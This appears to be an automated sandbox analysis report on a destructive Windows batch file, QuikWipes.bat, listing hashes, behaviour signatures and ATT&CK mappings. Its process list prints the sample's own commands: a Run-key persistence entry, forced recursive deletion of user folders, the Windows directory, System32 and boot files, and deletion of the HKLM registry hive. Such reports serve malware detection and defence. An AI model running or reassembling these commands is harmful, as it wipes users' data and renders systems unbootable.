Analysis

  • max time kernel
    271s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 04:25

General

  • Target

    QuikWipes.bat

  • Size

    47KB

  • MD5

    4159f980bd03895ac2431f5264cbe0cf

  • SHA1

    6b197f4f4ccf3f201c1ecc0ea145e79895acfb9f

  • SHA256

    6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2

  • SHA512

    181bf22d9446b2904dfc2cd8c76f66a43b99650d7c2db180646f00126838ba0c58afc849572e65eb613ba7f37df58a17d3a85b4742a14b7bde0e7135a50af0d8

  • SSDEEP

    192:a111111111111111111111111111111111111111111111111111111111111111:y

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs
  • Modifies firewall policy service 2 TTPs 16 IoCs
  • Modifies security service 2 TTPs 8 IoCs
  • Manipulates Digital Signatures 1 TTPs 64 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Installed Components in the registry 2 TTPs 50 IoCs
  • Registers new Print Monitor 2 TTPs 13 IoCs
  • Sets file execution options in registry 2 TTPs 47 IoCs
  • Modifies system executable filetype association 2 TTPs 46 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 64 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 7 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Maps connected drives based on registry 3 TTPs 3 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 59 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
      2⤵
      • Adds Run key to start application
      PID:3500
    • C:\Windows\system32\cmd.exe
      cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*
      2⤵
        PID:2124
      • C:\Windows\system32\cmd.exe
        cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*
        2⤵
          PID:552
        • C:\Windows\system32\cmd.exe
          cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*
          2⤵
            PID:4824
          • C:\Windows\system32\cmd.exe
            cmd.exe /k del /q /f /s C:\Users\Admin\Music\*
            2⤵
              PID:3304
            • C:\Windows\system32\cmd.exe
              cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*
              2⤵
                PID:4816
              • C:\Windows\system32\cmd.exe
                cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone
                2⤵
                  PID:4420
                • C:\Windows\system32\cmd.exe
                  cmd.exe /k RMDIR C:\Windows
                  2⤵
                    PID:1500
                  • C:\Windows\system32\taskkill.exe
                    TASKKILL /F /IM EXPLORER.EXE
                    2⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:216
                  • C:\Windows\system32\reg.exe
                    reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
                    2⤵
                    • Adds Run key to start application
                    PID:4920
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /k RMDIR C:\Windows
                    2⤵
                      PID:2008
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned
                      2⤵
                        PID:4592
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
                        2⤵
                          PID:4052
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark
                          2⤵
                            PID:212
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /k del /q /f /s C:\Windows\*
                            2⤵
                            • Drops file in Windows directory
                            PID:4112
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /k del /q /f /s C:\Windows\System32\*
                            2⤵
                            • Drops file in System32 directory
                            PID:2516
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
                            2⤵
                              PID:2360
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /k del /q /f /s C:\WindowsBoot\*
                              2⤵
                                PID:4484
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe
                                2⤵
                                  PID:5072
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*
                                  2⤵
                                    PID:1072
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /k RMDIR C:\Windows\System32\BCD
                                    2⤵
                                      PID:4624
                                    • C:\Windows\system32\reg.exe
                                      REG DELETE HKLM /f
                                      2⤵
                                      • Adds autorun key to be loaded by Explorer.exe on startup
                                      • Modifies firewall policy service
                                      • Modifies security service
                                      • Manipulates Digital Signatures
                                      • Modifies Installed Components in the registry
                                      • Registers new Print Monitor
                                      • Sets file execution options in registry
                                      • Modifies system executable filetype association
                                      • Registers COM server for autorun
                                      • Adds Run key to start application
                                      • Installs/modifies Browser Helper Object
                                      • Maps connected drives based on registry
                                      • Checks SCSI registry key(s)
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Modifies registry key
                                      PID:5008
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*
                                      2⤵
                                        PID:3748
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /k del /q /f /s C:\Windows\*
                                        2⤵
                                          PID:2532

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v13

                                      Persistence

                                      Boot or Logon Autostart Execution

                                      6
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      6
                                      T1547.001

                                      Create or Modify System Process

                                      2
                                      T1543

                                      Windows Service

                                      2
                                      T1543.003

                                      Event Triggered Execution

                                      1
                                      T1546

                                      Change Default File Association

                                      1
                                      T1546.001

                                      Browser Extensions

                                      1
                                      T1176

                                      Privilege Escalation

                                      Boot or Logon Autostart Execution

                                      6
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      6
                                      T1547.001

                                      Create or Modify System Process

                                      2
                                      T1543

                                      Windows Service

                                      2
                                      T1543.003

                                      Event Triggered Execution

                                      1
                                      T1546

                                      Change Default File Association

                                      1
                                      T1546.001

                                      Defense Evasion

                                      Modify Registry

                                      11
                                      T1112

                                      Subvert Trust Controls

                                      1
                                      T1553

                                      SIP and Trust Provider Hijacking

                                      1
                                      T1553.003

                                      Credential Access

                                      Unsecured Credentials

                                      1
                                      T1552

                                      Credentials In Files

                                      1
                                      T1552.001

                                      Discovery

                                      Query Registry

                                      5
                                      T1012

                                      Peripheral Device Discovery

                                      2
                                      T1120

                                      System Information Discovery

                                      4
                                      T1082

                                      Collection

                                      Data from Local System

                                      1
                                      T1005

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Temp\22265427411787636826741326151834811518.FUCKYOULMAO
                                        Filesize

                                        27B

                                        MD5

                                        9644e3ba2ce9ddbf0d46353cae08a3d9

                                        SHA1

                                        95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb

                                        SHA256

                                        7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0

                                        SHA512

                                        1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a

                                      • C:\Users\Admin\Desktop\HACKER2231615224111619878113162804320770537333862714041803272119027573.txt
                                        Filesize

                                        8B

                                        MD5

                                        a911b36535d43a8a9cd54b028ee92236

                                        SHA1

                                        74a5c2013b757dee646e9a2b480a1447fd96d1b3

                                        SHA256

                                        387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701

                                        SHA512

                                        61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3